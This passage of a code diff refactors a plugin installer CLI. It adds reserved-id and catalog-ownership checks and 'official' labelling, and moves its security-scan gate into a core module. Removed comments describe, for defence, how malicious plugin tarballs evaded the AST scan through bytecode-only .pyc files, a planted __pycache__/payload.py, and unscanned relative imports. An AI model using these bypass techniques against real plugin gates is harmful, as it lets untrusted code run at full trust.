+    if plugin_id in core_catalog.RESERVED_PLUGIN_IDS:
+        return (
+            f"外掛 id {plugin_id} 是保留名稱（/api/plugins/ 底下的路由），不能安裝。",
+            f"Plugin id '{plugin_id}' is reserved by this build "
+            f"(a route under /api/plugins/).",
+        )
+    if entry is not None and entry.kind == "builtin":
+        return (
+            f"外掛 id {plugin_id} 是保留名稱（CodefyUI 內建的外掛包），不能安裝。",
+            f"Plugin id '{plugin_id}' is reserved by this build "
+            f"(a pack that ships with CodefyUI).",
+        )
+    if (
+        entry is not None
+        and entry.kind == "github"
+        and f"{owner}/{repo}".lower() != (entry.repo or "").lower()
+    ):
+        return (
+            f"外掛 id {plugin_id} 在目錄中屬於 {entry.repo}；"
+            f"只有該儲存庫可以用這個 id 安裝，{owner}/{repo} 不行。",
+            f"Plugin id '{plugin_id}' belongs to {entry.repo} in this "
+            f"install's catalog; only that repository may install under it, "
+            f"not {owner}/{repo}.",
+        )
+    return None
+
+
+def _install_github(
+    owner: str,
+    repo: str,
+    ref: str,
+    args,
+    lockfile,
+    *,
+    catalog_id: str | None = None,
+) -> int:
+    """Install the pack in ``{owner}/{repo}`` at *ref*.
+
+    *catalog_id* is the catalog row this install came from, when it came from
+    one; it is recorded in the lockfile so a later reader can tell the
+    catalog's own pack from free text that happens to carry the same id.
+    Keyword-only and last so the five positional arguments stay what they
+    were -- ``scripts/project.py`` restores a project's pins through this
+    function positionally.
+    """
     url = f"https://github.com/{owner}/{repo}"
     info(f"來源：{url}", f"Source: {url}")
     pinned_sha = getattr(args, "pinned_sha", None)
@@ -798,12 +910,12 @@ def _install_github(owner: str, repo: str, ref: str, args, lockfile) -> int:
             err(str(e), str(e))
             return 1
 
-        # Reserved ids: anything matching a catalog-builtin slot.
-        if plugin_id in load_catalog().get("plugins", {}):
-            err(
-                f"外掛 id {plugin_id} 與內建保留名稱衝突",
-                f"Plugin id '{plugin_id}' is reserved by the built-in catalog",
-            )
+        # Reserved ids: a route, a pack that ships here, or another
+        # repository's catalog row. See _reserved_id_refusal for why the third
+        # is about which repo rather than about the id alone.
+        refusal = _reserved_id_refusal(plugin_id, owner, repo)
+        if refusal is not None:
+            err(*refusal)
             return 1
 
         final = plugins_user_root() / plugin_id
@@ -845,7 +957,7 @@ def _install_github(owner: str, repo: str, ref: str, args, lockfile) -> int:
                     backup.rename(final)
                 return rc
 
-        lockfile.setdefault("plugins", {})[plugin_id] = {
+        record: dict[str, Any] = {
             "source_kind": "github_url",
             "source": f"{owner}/{repo}" + (f"@{ref}" if ref else ""),
             "url": url,
@@ -857,6 +969,13 @@ def _install_github(owner: str, repo: str, ref: str, args, lockfile) -> int:
             "capabilities": list(capabilities),
             "enabled": True,
         }
+        if catalog_id is not None:
+            # Only when there really was a catalog row. Writing the key
+            # unconditionally would have every free-text install claim a
+            # catalog identity it does not have, and "installed from the
+            # catalog" is exactly the claim a reader wants to trust.
+            record["catalog_id"] = catalog_id
+        lockfile.setdefault("plugins", {})[plugin_id] = record
         save_lockfile(lockfile)
 
         if backup is not None:
@@ -1529,22 +1648,33 @@ def cmd_info(args: argparse.Namespace) -> int:
         err(str(e), str(e))
         return 2
 
+    owner, repo = a, b
     if kind == "catalog":
-        catalog_entry = load_catalog()["plugins"][a]
-        plugin_dir = plugins_builtin_root() / a
-        try:
-            manifest = read_manifest(plugin_dir)
-        except FileNotFoundError:
-            manifest = {"plugin": {"name": catalog_entry.get("name", a)}}
-        synthetic_entry = {
-            "source_kind": "builtin",
-            "source": a,
-            "manifest": manifest.get("plugin", {}),
-        }
-        _print_info(a, manifest, synthetic_entry, plugin_dir, installed=False)
-        return 0
+        catalog_row = catalog_entry(a)
+        if catalog_row is not None and catalog_row.kind == "github":
+            # The catalog's own words first, then the live repository. In that
+            # order because the catalog answers "is this the pack I meant, and
+            # does CodefyUI vouch for it" even when the network half below
+            # cannot be reached, and because `official` is a claim only the
+            # catalog is entitled to make.
+            _print_catalog_row(catalog_row)
+            owner, _, repo = (catalog_row.repo or "").partition("/")
+            ref = catalog_row.ref
+        else:
+            raw_row = load_catalog()["plugins"][a]
+            plugin_dir = plugins_builtin_root() / a
+            try:
+                manifest = read_manifest(plugin_dir)
+            except FileNotFoundError:
+                manifest = {"plugin": {"name": raw_row.get("name", a)}}
+            synthetic_entry = {
+                "source_kind": "builtin",
+                "source": a,
+                "manifest": manifest.get("plugin", {}),
+            }
+            _print_info(a, manifest, synthetic_entry, plugin_dir, installed=False)
+            return 0
 
-    owner, repo, ref = a, b, ref
     try:
         sha = resolve_sha(owner, repo, ref)
     except RuntimeError as e:
@@ -1566,6 +1696,40 @@ def cmd_info(args: argparse.Namespace) -> int:
     }
     _print_info(manifest.get("plugin", {}).get("id", "(unnamed)"), manifest, synthetic_entry, None, installed=False)
     return 0
+
+
+def _print_catalog_row(entry: core_catalog.CatalogEntry) -> None:
+    """What this install's catalog says about a repository pack.
+
+    Everything here is the catalog's claim, not the repository's: the name a
+    student saw in ``cdui plugin search``, the repo the installer will
+    actually fetch, and whether CodefyUI vouches for it. A manifest fetched
+    from the repository can say anything at all, so ``official`` in
+    particular has to come from this side of the line.
+
+    The field layout matches :func:`_print_info`, which prints the live
+    details straight after, so the two blocks read as one answer.
+    """
+    section(f"目錄項目：{entry.id}", f"Catalog entry: {entry.id}")
+    fields: list[tuple[str, str]] = [("name", entry.name)]
+    if entry.description:
+        fields.append(("description", entry.description))
+    if entry.repo:
+        fields.append(("repo", entry.repo))
+    if entry.homepage:
+        fields.append(("homepage", entry.homepage))
+    if entry.tags:
+        fields.append(("tags", ", ".join(entry.tags)))
+    fields.append((
+        "official",
+        t("是，由 CodefyUI 發布", "yes, published by CodefyUI")
+        if entry.official
+        else t("否（第三方外掛）", "no (third-party plugin)"),
+    ))
+
+    width = max(len(k) for k, _ in fields) + 2
+    for k, v in fields:
+        print(f"  {DIM}{(k + ':').ljust(width)}{RESET} {v}")
 
 
 def _print_info(
@@ -1744,6 +1908,10 @@ def cmd_search(args: argparse.Namespace) -> int:
             plugin_id,
             entry.get("name", ""),
             entry.get("description", ""),
+            # The repository is searchable too: someone who has the GitHub
+            # page open has "CodefyUI-Plugin-Graph-Copilot" in front of them
+            # and no reason to guess that the catalog calls it graph-copilot.
+            entry.get("repo", "") or "",
             " ".join(entry.get("chapters", []) or []),
             " ".join(entry.get("tags", []) or []),
         ]).lower()
@@ -1761,9 +1929,16 @@ def cmd_search(args: argparse.Namespace) -> int:
     width = max(len(pid) for pid, _ in matches) + 2
     for plugin_id, entry in sorted(matches):
         marker = f"{GREEN}{MARK_INSTALLED}{RESET}" if plugin_id in lockfile_ids else " "
+        # Say where a pack comes from. Installing a github entry downloads and
+        # runs someone else's code, which activating a built-in pack does not,
+        # and "official" is the catalog saying whose code it is.
+        if entry.get("kind") == "github":
+            tag = " [github, official]" if entry.get("official") else " [github]"
+        else:
+            tag = ""
         print(
             f"  {marker} {BOLD}{plugin_id.ljust(width)}{RESET}"
-            f"{entry.get('name', plugin_id)}"
+            f"{entry.get('name', plugin_id)}{DIM}{tag}{RESET}"
         )
         desc = entry.get("description", "")
         if desc:

--- a/scripts/plugins.py
+++ b/scripts/plugins.py
@@ -21,7 +21,6 @@ which ``security.allowed_modules`` the user accepted.
 from __future__ import annotations
 
 import argparse
-import importlib.machinery
 import json
 import os
 import re
@@ -34,7 +33,7 @@ import time
 import urllib.request
 from datetime import datetime, timezone
 from pathlib import Path
-from typing import Any, Iterable
+from typing import Any
 from urllib.error import HTTPError, URLError
 
 if sys.version_info >= (3, 11):
@@ -52,8 +51,31 @@ from app.core.plugin_loader import (
     removed_ids,
     save_lockfile,
 )
-from app.core.plugin_validator import PluginValidationError, validate_python_source
-from app.core.script_policy import TIER0_DENIED_ATTRS
+from app.core.plugins import catalog as core_catalog
+from app.core.plugins import sources as core_sources
+from app.core.plugins.errors import UnknownCatalogName, UnparseableSource
+# The rules live in ``app.core.plugins`` so that the server can read them too;
+# what follows is this module keeping the names it has always exported. The
+# ``X as X`` spelling on the ones this file never calls itself is the
+# explicit-re-export convention -- it marks them as deliberate rather than
+# left over, for the linter and for the next reader.
+from app.core.plugins.gate import (
+    LOADER_SUFFIXES as LOADER_SUFFIXES,
+    SCANNABLE_SUFFIXES as SCANNABLE_SUFFIXES,
+    PluginValidationError,
+    loader_suffix as loader_suffix,
+    validate_nodes_dir as validate_nodes_dir,
+    validate_plugin_dir,
+)
+from app.core.plugins.manifest import (
+    PLUGIN_ID_RE,
+    SUPPORTED_SCHEMA as SUPPORTED_SCHEMA,
+    manifest_capabilities,
+    manifest_has_frontend as _manifest_has_frontend,
+    read_manifest,
+    validate_manifest,
+)
+from app.core.plugins.sources import _GITHUB_SHORT, _GITHUB_URL
 from app.core.security_tiers import (
     CAPABILITIES,
     CAPABILITY_SUMMARY,
@@ -180,81 +202,40 @@ def _capability_line(capability: str) -> str:
     )
 
 
-def manifest_capabilities(manifest: dict[str, Any]) -> tuple[str, ...]:
-    """The normalised ``[security].capabilities`` a manifest declares."""
-    security = manifest.get("security")
-    if not isinstance(security, dict):
-        return ()
-    return normalize_capabilities(security.get("capabilities"))
-
-
 # ── catalog ────────────────────────────────────────────────────────────────
+#
+# Thin wrappers rather than plain re-exports, and deliberately so: the CLI's
+# tests redirect the catalog by patching ``plugins.load_catalog`` and the
+# built-in root by patching ``plugins.plugins_builtin_root``. Reading those
+# through this module's own attributes is what keeps the patch working -- a
+# core function that called its own copy would answer from the real
+# ``registry.json`` while a test believed it had replaced it.
 
 def _catalog_path() -> Path:
-    return plugins_builtin_root() / "registry.json"
+    return core_catalog.catalog_path(plugins_builtin_root())
 
 
 def load_catalog() -> dict[str, Any]:
-    p = _catalog_path()
-    if not p.exists():
-        return {"schema": 1, "plugins": {}}
-    try:
-        return json.loads(p.read_text(encoding="utf-8"))
-    except (json.JSONDecodeError, OSError):
-        return {"schema": 1, "plugins": {}}
+    return core_catalog.load_catalog(plugins_builtin_root())
 
 
 def builtin_catalog_packs() -> dict[str, dict[str, Any]]:
     """The ``kind = "builtin"`` half of the catalog — packs that ship in-repo."""
-    return {
-        pack_id: entry
-        for pack_id, entry in load_catalog().get("plugins", {}).items()
-        if isinstance(entry, dict) and entry.get("kind") == "builtin"
-    }
+    return core_catalog.builtin_catalog_packs(load_catalog())
 
 
 def available_builtin_packs() -> list[tuple[str, str]]:
     """Built-in packs shipped on disk that this install has made no decision about.
 
-    A release can add a pack (``stats`` did), and its files land on disk with
-    the update — but the server only loads what the lockfile records, and
-    nothing re-syncs it. So the pack is fully installable and completely
-    invisible: the nodes never appear, and no message anywhere says why.
-
-    "No decision" is the operative phrase (#175): a pack the user uninstalled
-    is subtracted too. Before uninstall left a tombstone, the entry was simply
-    popped, so a removed pack was indistinguishable from one this install had
-    never seen — which is why the notices used to nag about a pack the user had
-    already thrown away, once per start, forever.
-
-    Returns ``(id, display name)`` pairs, sorted, so callers can name them.
+    See :func:`app.core.plugins.catalog.available_builtin_packs` — the rule,
+    and why a pack the user uninstalled is not "available", live there.
     """
-    try:
-        catalog = builtin_catalog_packs()
-        lockfile = load_lockfile()
-        installed = lockfile.get("plugins", {})
-        tombstoned = removed_ids(lockfile)
-    except Exception:  # never let discoverability break a caller
-        return []
-    out: list[tuple[str, str]] = []
-    for pack_id, entry in catalog.items():
-        if pack_id in installed or pack_id in tombstoned:
-            continue
-        out.append((pack_id, str(entry.get("name") or pack_id)))
-    return sorted(out)
+    return core_catalog.available_builtin_packs(
+        read_catalog=load_catalog, read_lockfile=load_lockfile
+    )
 
 
 # ── source parsing ─────────────────────────────────────────────────────────
-
-# Accepts owner/repo or owner/repo@ref; owner/repo names are GitHub-permissible.
-_GITHUB_SHORT = re.compile(r"^([\w.-]+)/([\w.-]+?)(?:@([\w./-]+))?$")
-_GITHUB_URL = re.compile(
-    r"^https?://(?:www\.)?github\.com/([\w.-]+)/([\w.-]+?)(?:\.git)?/?(?:@(.+))?$"
-)
-# One word, no slash and no scheme: the only thing it can have been meant as is
-# a catalog name. See _unknown_catalog_name for why that deserves its own error.
-_BARE_NAME = re.compile(r"^[A-Za-z0-9][\w.-]*$")
-
 
 def _unknown_catalog_name(spec: str, known: list[str]) -> ValueError:
     """The error for a bare word this install's catalog does not have (#363).
@@ -298,34 +279,33 @@ def parse_source(spec: str) -> tuple[str, str, str, str]:
 
     For catalog: ``a`` = plugin id; ``b`` and ``ref`` are empty.
     For github: ``a`` = owner, ``b`` = repo, ``ref`` = tag/branch/sha (may be empty).
+
+    The parsing rule is :func:`app.core.plugins.sources.parse_source`; what is
+    here is the CLI's half of it. The catalog is read through this module (see
+    the wrappers above), and the structured refusal is turned back into the
+    bilingual ``ValueError`` every caller of this function already catches.
     """
     catalog = load_catalog()
-    known = sorted(catalog.get("plugins", {}))
-    if spec.lower() in catalog.get("plugins", {}):
-        return ("catalog", spec.lower(), "", "")
-
-    m = _GITHUB_URL.match(spec)
-    if m:
-        return ("github", m.group(1), m.group(2), m.group(3) or "")
-
-    m = _GITHUB_SHORT.match(spec)
-    if m:
-        return ("github", m.group(1), m.group(2), m.group(3) or "")
-
-    if _BARE_NAME.match(spec):
-        raise _unknown_catalog_name(spec, known)
-
-    # Name the example from the catalog rather than hard-coding it: this line
-    # spent three releases telling people to try "C2" after that pack was gone.
-    example = known[0] if known else "foundations"
-    raise ValueError(
-        t(
-            f"無法解析外掛來源：{spec!r}。請輸入內建包名稱"
-            f"（例如 {example}）、owner/repo[@ref] 或 GitHub URL。",
-            f"Could not parse plugin source: {spec!r}. "
-            f"Expected a catalog name (e.g. {example}), owner/repo[@ref], or a GitHub URL.",
+    try:
+        parsed = core_sources.parse_source(
+            spec, catalog=catalog, catalog_path=_catalog_path()
         )
-    )
+    except UnknownCatalogName as e:
+        raise _unknown_catalog_name(spec, list(e.known)) from None
+    except UnparseableSource:
+        # Name the example from the catalog rather than hard-coding it: this line
+        # spent three releases telling people to try "C2" after that pack was gone.
+        known = sorted(catalog.get("plugins", {}))
+        example = known[0] if known else "foundations"
+        raise ValueError(
+            t(
+                f"無法解析外掛來源：{spec!r}。請輸入內建包名稱"
+                f"（例如 {example}）、owner/repo[@ref] 或 GitHub URL。",
+                f"Could not parse plugin source: {spec!r}. "
+                f"Expected a catalog name (e.g. {example}), owner/repo[@ref], or a GitHub URL.",
+            )
+        ) from None
+    return (parsed.kind, parsed.name_or_owner, parsed.repo, parsed.ref)
 
 
 # ── GitHub helpers ─────────────────────────────────────────────────────────
@@ -375,366 +355,6 @@ def download_tarball(owner: str, repo: str, sha: str, dest: Path) -> None:
                     f"Tarball exceeds {MAX_TARBALL_BYTES // (1024 * 1024)} MB limit."
                 )
             fout.write(chunk)
-
-
-# ── manifest ───────────────────────────────────────────────────────────────
-
-PLUGIN_ID_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]*[a-z0-9])?$")
-SUPPORTED_SCHEMA = 1
-
-
-def read_manifest(plugin_root: Path) -> dict[str, Any]:
-    p = plugin_root / MANIFEST_FILENAME
-    if not p.exists():
-        raise FileNotFoundError(f"Manifest not found at {p}")
-    return tomllib.loads(p.read_text(encoding="utf-8"))
-
-
-def validate_manifest(m: dict[str, Any]) -> None:
-    plugin = m.get("plugin")
-    if not isinstance(plugin, dict):
-        raise ValueError("Manifest is missing required [plugin] table.")
-    schema_version = plugin.get("schema_version")
-    if schema_version != SUPPORTED_SCHEMA:
-        raise ValueError(
-            f"Unsupported plugin schema_version: {schema_version!r}. "
-            "Upgrade cdui or use an older plugin release."
-        )
-    plugin_id = plugin.get("id", "")
-    if not PLUGIN_ID_RE.match(plugin_id):
-        raise ValueError(
-            f"Invalid plugin id: {plugin_id!r}. "
-            "Must match ^[a-z0-9](?:[a-z0-9-]*[a-z0-9])?$"
-        )
-    _validate_security_table(m.get("security"))
-
-
-def _validate_security_table(security: Any) -> None:
-    """Check ``[security]`` before anything acts on it.
-
-    Both keys are lists of strings, and a wrong shape used to fail silently in
-    the worst possible direction: ``allowed_modules = "os"`` reaches
-    ``frozenset("os")``, which is ``{"o", "s"}``, which grants nothing and
-    unlocks nothing while printing "Plugin requests non-default modules: o, s".
-    A manifest is hand-written; say what is wrong with it.
-
-    An unknown capability is an error rather than a no-op. It is either a typo
-    or a manifest written against a newer CodefyUI, and granting nothing then
-    failing at the import would blame the wrong line.
-    """
-    if security is None:
-        return
-    if not isinstance(security, dict):
-        raise ValueError("[security] must be a table.")
-    for key in ("allowed_modules", "capabilities"):
-        value = security.get(key)
-        if value is None:
-            continue
-        if not isinstance(value, list) or not all(isinstance(v, str) for v in value):
-            raise ValueError(
-                f"[security].{key} must be a list of strings, got {value!r}."
-            )
-    unknown = unknown_capabilities(security.get("capabilities"))
-    if unknown:
-        raise ValueError(
-            f"Unknown capability in [security].capabilities: "
-            f"{', '.join(unknown)}. This build knows: {', '.join(CAPABILITIES)}."
-        )
-
-
-def _denied_attributes_for(allowed_modules: list[str]) -> frozenset[str]:
-    """core#179's ``denied_attributes`` set, lifted at Tier 2.
-
-    A method on a value a Tier-0 import hands back (``numpy.zeros(3).dump(
-    path)``) is an arbitrary file write with zero capability declared: the
-    blocklist gate is keyed on Import nodes, so it never sees what an
-    allowed library's return value can do. Already closed for in-canvas
-    scripts via ``TIER0_DENIED_ATTRS`` passed as ``denied_attributes``; this
-    is the same constant, not a re-derived smaller list, so the two surfaces
-    cannot drift on what "closed" means. Deliberately NOT
-    ``SCRIPT_PROXY_DENIED_ATTRS``, which also folds in the module-gateway
-    attrs (``.hub``'s sibling problem, not this one) and the RCE leaves as
-    attributes -- both closed for scripts for reasons specific to an
-    allowlisted, unreviewed surface that do not hold for a file the user
-    chose to install.
-
-    Lifted entirely at Tier 2 (``allowed_modules`` non-empty, which only
-    happens once ``--trust-author`` has already been accepted -- see
-    ``_install_github``, which refuses to call either caller of this
-    function with a non-empty ``allowed`` otherwise). Closing these at Tier
-    0/1 is right: a plugin that declared nothing, or only a capability, gets
-    no new file-write / remote-fetch-and-execute surface for free, and
-    before core#179 a plugin could not even define a method named ``save``
-    without failing installation outright. Refusing them at Tier 2 is
-    incoherent, and the dunder/RCE-leaf precedent (never lifted by any
-    tier -- see the walker's own denied-attrs handling) does not transfer:
-    those rules refuse REFLECTION, which core#133's own docs say no
-    capability ever buys. ``.dump`` / ``.hub`` / ``.save`` are not
-    reflection -- they are file writes and remote code fetches, and
-    ``--trust-author`` has already granted an equivalent or greater version
-    of both by a shorter route (bare ``subprocess`` reaches further than
-    ``numpy.save`` ever could), so refusing the narrower path while granting
-    the wider one protects nothing.
-    """
-    return frozenset() if allowed_modules else TIER0_DENIED_ATTRS
-
-
-# ── core#220: the walk covers what the LOADER covers, by extension ─────────
-#
-# ``validate_plugin_dir`` used to enumerate ``*.py``. The loader imports more
-# than that: ``plugin_loader.install_plugin_finder`` sets the synthetic
-# package's ``__path__`` to the plugin directory, which puts the stock
-# ``FileFinder`` loaders in charge, and those accept every suffix in
-# ``importlib.machinery.all_suffixes()``. Verified on a real interpreter, not
-# reasoned about -- a plugin whose ``nodes/`` held only ``helper.pyc``,
-# ``w.pyw`` and ``native.cp314-win_amd64.pyd``::
-#
-#     loader suffixes:        ['.py', '.pyw', '.pyc', '.cp314-win_amd64.pyd', '.pyd']
-#     files a *.py glob sees: ['__init__.py']            (i.e. none of them)
-#     pkgutil reports:        ['helper', 'native', 'w']  (i.e. all of them)
-#     validate_plugin_dir():  ACCEPTED, no exception
-#
-# ...and the ``.pyc`` then imported and ran its ``os.system`` payload. That is
-# not the gate failing open on a rule; it is the gate never running, which is
-# strictly worse and is why this is keyed on the interpreter's own answer
-# rather than on a hardcoded list -- the same "ask, don't assume" move
-# ``_compute_os_path_module_leaves`` makes for ``os.path``.
-#
-# ``.pyw`` and the extension suffixes are unioned in explicitly ON TOP of
-# ``all_suffixes()`` because that function answers for the CURRENT
-# interpreter, and a tarball is not installed on the machine that built it:
-# ``.pyw`` is a source suffix only on Windows, and ``.so`` / ``.pyd`` /
-# ``.dylib`` each exist on exactly one platform. Scanning the union means the
-# verdict on a given tarball does not depend on which OS ran the installer.
-_EXTRA_SOURCE_SUFFIXES = frozenset({".pyw"})
-_CROSS_PLATFORM_BINARY_SUFFIXES = frozenset({
-    ".pyc", ".pyo", ".pyd", ".so", ".dylib",
-})
-
-#: Suffixes that are Python SOURCE and can therefore be handed to the AST
-#: gate. ``.pyw`` is ordinary Python text -- only the launcher treats it
-#: differently -- so it is scanned, not refused.
-SCANNABLE_SUFFIXES: frozenset[str] = (
-    frozenset(importlib.machinery.SOURCE_SUFFIXES) | _EXTRA_SOURCE_SUFFIXES
-)
-
-#: Every suffix an ``import`` statement can resolve to a file, anywhere this
-#: tarball might be installed. Asserted against ``all_suffixes()`` by a
-#: standing test, so a future CPython that grows a loader suffix fails loudly
-#: instead of silently widening the hole this closed.
-LOADER_SUFFIXES: frozenset[str] = (
-    frozenset(importlib.machinery.all_suffixes())
-    | SCANNABLE_SUFFIXES
-    | _CROSS_PLATFORM_BINARY_SUFFIXES
-)
-
-
-def loader_suffix(path: Path) -> str | None:
-    """The loader suffix *path* would be imported under, or ``None``.
-
-    Longest match wins, because the extension suffixes nest:
-    ``native.cp314-win_amd64.pyd`` ends with both ``.cp314-win_amd64.pyd``
-    and ``.pyd``, and the longer one is the right answer twice over -- it is
-    what the refusal message should name, and stripping only ``.pyd`` would
-    leave a stem of ``native.cp314-win_amd64``, which the identifier test in
-    :func:`_names_an_importable_module` would then wave through.
-
-    A name that is ONLY a suffix (a file literally called ``.py``) answers
-    ``None``: the stem would be empty, so there is no module name for an
-    ``import`` statement to spell.
-    """
-    name = path.name
-    best: str | None = None
-    for suffix in LOADER_SUFFIXES:
-        if len(name) > len(suffix) and name.endswith(suffix):
-            if best is None or len(suffix) > len(best):
-                best = suffix
-    return best
-
-
-def _names_an_importable_module(path: Path, suffix: str) -> bool:
-    """Whether an ``import`` statement could name the module *path* holds.
-
-    The same structural question ``_VALIDATION_SKIP_DIRS`` asks about
-    ``.git``, applied to a FILE: strip the loader suffix and ask whether what
-    is left is a valid Python identifier. If it is not, no import statement
-    -- absolute or relative -- can name it, so nothing can reach it.
-
-    This exists for exactly one shape, and getting it wrong in either
-    direction is a real failure, so it was verified rather than reasoned
-    about. CPython writes its own bytecode cache as
-    ``__pycache__/real.cpython-314.pyc``; an attacker writes
-    ``__pycache__/payload.pyc``. Both are ``.pyc`` files in the same
-    directory, and they are not the same thing::
-
-        __pycache__/payload.pyc            stem 'payload'          identifier
-        __pycache__/real.cpython-314.pyc   stem 'real.cpython-314' NOT
-
-        pkgutil.iter_modules(__pycache__)          -> ['payload']
-        import <pkg>.nodes.__pycache__.payload     -> OK, ran the bytecode
-        import <pkg>.nodes.__pycache__.real        -> ModuleNotFoundError
-
-    So the refusal has to fire on the first and must NOT fire on the second:
-    a plugin directory that any interpreter has ever imported from has a
-    ``__pycache__`` full of the second kind, including this repo's own
-    built-in packs, and refusing to install over an ordinary compilation
-    artifact would be a false positive with no matching security value.
-
-    Applied only to the suffixes that get REFUSED. Source files are scanned
-    whatever they are called: scanning is never wrong, and the previous
-    ``*.py`` glob scanned an unimportably-named ``my-node.py`` too.
-    """
-    return path.name[: -len(suffix)].isidentifier()
-
-
-def _validate_importable_tree(
-    root: Path,
-    allowed_modules: list[str],
-    capabilities: Iterable[str],
-    *,
-    skip_dirs: frozenset[str] = frozenset(),
-) -> None:
-    """AST-scan every importable source file under *root*; refuse the rest.
-
-    "The rest" is the whole point. A ``.pyc`` cannot be AST-scanned without
-    decompiling it and a ``.pyd`` / ``.so`` cannot be scanned even in
-    principle, so the only two honest answers are "refuse" and "import
-    unexamined code at full trust". This picks the first, by name, with a
-    message that says which file and why -- never a silent skip, which is
-    exactly what the ``*.py`` glob was doing.
-    """
-    if not root.exists():
-        return
-    root_resolved = root.resolve()
-    for path in sorted(root.rglob("*")):
-        if not path.is_file():
-            continue
-        rel_parts = path.resolve().relative_to(root_resolved).parts
-        if skip_dirs and any(part in skip_dirs for part in rel_parts):
-            continue
-        suffix = loader_suffix(path)
-        if suffix is None:
-            continue
-        rel = "/".join(rel_parts)
-        if suffix not in SCANNABLE_SUFFIXES:
-            if not _names_an_importable_module(path, suffix):
-                continue
-            raise PluginValidationError(
-                f"'{rel}' cannot be installed: Python's import system loads "
-                f"'{suffix}' files, but they are compiled rather than source, "
-                f"so the security scan cannot look inside one. Every file a "
-                f"plugin can have imported has to be readable as source -- "
-                f"ship the '.py' this was built from instead"
-            )
-        content = path.read_bytes()
-        if not content.strip():
-            continue
-        validate_python_source(
-            content,
-            path.name,
-            allowed_modules=allowed_modules,
-            capabilities=list(capabilities),
-            denied_attributes=_denied_attributes_for(allowed_modules),
-        )
-
-
-def validate_nodes_dir(
-    nodes_dir: Path,
-    allowed_modules: list[str],
-    capabilities: Iterable[str] = (),
-) -> None:
-    _validate_importable_tree(nodes_dir, allowed_modules, capabilities)
-
-
-# Directories within an extracted plugin tarball that are *not* reachable
-# through Python's import system, whatever the loader's ``__path__`` covers --
-# safe to skip the AST gate because there is no route from an ``import``
-# statement to a file in here. Everything else -- ``examples/``, ``tests/``,
-# ``docs/``, ``assets/``, ``__pycache__``, any other top-level helper -- gets
-# scanned, because ``plugin_loader.install_plugin_finder`` registers the
-# WHOLE plugin directory as a PEP-420 namespace package's ``__path__`` (not
-# only ``nodes/``), so ``from .. import _helpers`` -- or ``from ..tests
-# import payload`` -- from inside a scanned ``nodes/foo.py`` would otherwise
-# pull in unscanned code at full trust, automatically, at server boot or
-# reload (core#182).
-#
-# ``__pycache__`` is deliberately NOT on this set, despite an earlier version
-# of this comment claiming it was safe to skip because "a real __pycache__
-# never holds a *.py this glob would match." That is true of the directory
-# CPython writes and irrelevant here: the attacker supplies the tarball, so
-# `__pycache__/payload.py` exists because they put it there, and
-# `"__pycache__".isidentifier()` is `True` -- PEP-420 namespace resolution
-# imports it exactly like any other directory name. Verified directly, not
-# merely argued: with a plugin installed through the real loader, both
-# `importlib.import_module("cdui_plugins.<id>.__pycache__.payload")` and a
-# relative `from ..__pycache__ import payload` inside `nodes/` resolve to the
-# planted file, and `validate_plugin_dir` (before this fix) accepted it
-# silently. Reasoning about what a directory name conventionally holds is not
-# the same claim as reasoning about what Python's import system can reach,
-# and only the second one is what this set is for.
-#
-# ``.git`` is the one name that passes that test for real: `.git` is not a
-# valid identifier (`".git".isidentifier()` is `False`, and `.` cannot appear
-# inside one), so no `import` statement -- absolute or relative -- can ever
-# name a package component spelled that way. That is a structural guarantee
-# independent of what is inside the directory, which is the property this
-# set exists to require before trusting a name to be un-scanned.
-#
-# Narrowing the LOADER's ``__path__`` instead, so a skipped directory were
-# unreachable rather than merely unscanned, was considered and rejected:
-# PEP-420 namespace packages have no native "every subdirectory except these"
-# carve-out, so that route needs a custom import finder/loader -- new import
-# machinery, not an extension of either existing one -- for a difference this
-# scan already erases by scanning first.
-_VALIDATION_SKIP_DIRS = frozenset({".git"})
-
-
-def validate_plugin_dir(
-    plugin_root: Path,
-    allowed_modules: list[str],
-    capabilities: Iterable[str] = (),
-) -> None:
-    """Walk the entire plugin directory and validate every importable file.
-
-    The original ``validate_nodes_dir`` only checked ``nodes/`` which left a
-    bypass via top-level helpers. This visits every file in the tree that
-    Python's import system could load, except the ones under
-    :data:`_VALIDATION_SKIP_DIRS` -- ``.git`` alone, the one name provably
-    unreachable through Python's import system (not a valid identifier, so
-    no ``import`` can ever name it). Nothing else is skipped: ``examples/``,
-    ``tests/``, ``docs/``, ``assets/`` and ``__pycache__`` all get scanned
-    too (core#182), because the plugin loader registers the WHOLE directory
-    as a namespace package's ``__path__``, so a scanned ``nodes/foo.py`` can
-    ``from ..tests import payload`` -- or ``from ..__pycache__ import
-    payload`` -- into any of them.
-
-    "Every file the import system could load" is by EXTENSION as well as by
-    directory since core#220: this used to glob ``*.py`` while the loader
-    also accepts ``.pyw``, ``.pyc`` and ``.pyd`` / ``.so``, so a plugin
-    shipping ``nodes/helper.pyc`` and no ``helper.py`` was never scanned at
-    all -- the gate did not fail open, it never ran. Source suffixes are
-    scanned; compiled ones are refused by name (see
-    :func:`_validate_importable_tree`), because a plugin has no legitimate
-    reason to ship a bytecode-only or binary module through this path and
-    neither can be AST-scanned.
-
-    *capabilities* are the ones the user confirmed at install time. They are
-    passed to every file rather than per-file, because a capability is a
-    property of the INSTALL, not of a source file: a plugin granted
-    ``network`` may reach it from wherever it likes inside its own tree.
-
-    *allowed_modules* also lifts the ``denied_attributes`` closed by
-    core#179 -- see :func:`_denied_attributes_for` -- because a non-empty
-    list here only happens once ``--trust-author`` has already been
-    accepted, and refusing ``arr.dump()`` to a plugin trusted with
-    ``subprocess`` protects nothing.
-    """
-    _validate_importable_tree(
-        plugin_root,
-        allowed_modules,
-        capabilities,
-        skip_dirs=_VALIDATION_SKIP_DIRS,
-    )
 
 
 # ── runtime helpers ────────────────────────────────────────────────────────
@@ -1131,11 +751,6 @@ def _install_catalog(plugin_id: str, args, lockfile) -> int:
         )
     ok(f"安裝完成：{plugin_id}", f"Installed: {plugin_id}")
     return 0
-
-
-def _manifest_has_frontend(manifest: dict) -> bool:
-    fe = manifest.get("frontend")
-    return isinstance(fe, dict) and isinstance(fe.get("entry"), str) and bool(fe.get("entry"))
 
 
 def _install_github(owner: str, repo: str, ref: str, args, lockfile) -> int:

--- a/scripts/plugins.py
+++ b/scripts/plugins.py
@@ -349,9 +349,10 @@ def parse_source(spec: str) -> tuple[str, str, str, str]:
 # Plain re-exports, not wrappers: the request rules (the token header, the two
 # shapes of failure, the size cap) live in ``app.core.plugins.github`` so the
 # server obeys them too. These three keep their names here because they are
-# what this module CALLS, and the install tests replace them to stay off the
-# network -- patching ``plugins.resolve_sha`` has to be what
